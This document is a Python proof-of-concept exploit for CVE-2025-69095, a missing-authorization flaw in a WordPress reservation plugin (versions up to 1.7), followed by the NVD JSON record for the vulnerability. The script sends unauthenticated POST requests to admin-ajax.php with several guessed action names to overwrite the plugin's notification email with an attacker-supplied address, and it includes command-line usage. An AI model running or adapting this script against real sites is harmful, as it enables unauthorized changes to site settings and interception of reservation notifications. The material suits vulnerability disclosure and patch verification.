CVE-2025-69095

import requests import sys def exploit_cve_2025_69095(target_url, malicious_setting): """ PoC for CVE-2025-69095: Missing Authorization in dt-reservation-plugin This PoC demonstrates the lack of authorization check on plugin settings modification. """ # Identify the vulnerable endpoint ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Common vulnerable action names for dt-reservation-plugin action_names = [ "dt_reservation_save_settings", "reservation_save_settings", "dt_reservation_update_settings", "save_dt_reservation_settings" ] headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } for action in action_names: # Payload to modify plugin settings data = { "action": action, "setting_key": "notification_email", "setting_value": malicious_setting, "nonce": "" # No nonce required due to missing authorization } try: response = requests.post(ajax_endpoint, data=data, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Successfully sent request with action: {action}") print(f"[+] Response: {response.text[:200]}") return True except requests.RequestException as e: print(f"[-] Request failed for action {action}: {e}") print("[-] Exploitation failed - no vulnerable endpoint found") return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python poc.py <target_url> <malicious_email>") print("Example: python poc.py https://example.com [email protected]") sys.exit(1) target = sys.argv[1] malicious_value = sys.argv[2] exploit_cve_2025_69095(target, malicious_value)

{"cve": {"id": "CVE-2025-69095", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:22.297", "lastModified": "2026-04-27T20:16:27.110", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in designthemes Reservation Plugin dt-reservation-plugin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Reservation Plugin: from n/a through <= 1.7."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en el plugin de reservas dt-reservation-plugin de designthemes permite la explotación de niveles de seguridad de control de acceso incorrectamente configurados. Este problema afecta al plugin de reservas: desde n/a hasta &lt;= 1.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/dt-reservation-plugin/vulnerability/wordpress-reservation-plugin-plugin-1-7-settings-change-vulnerability?_s_id=cve", "source": "[email protected]"}]}}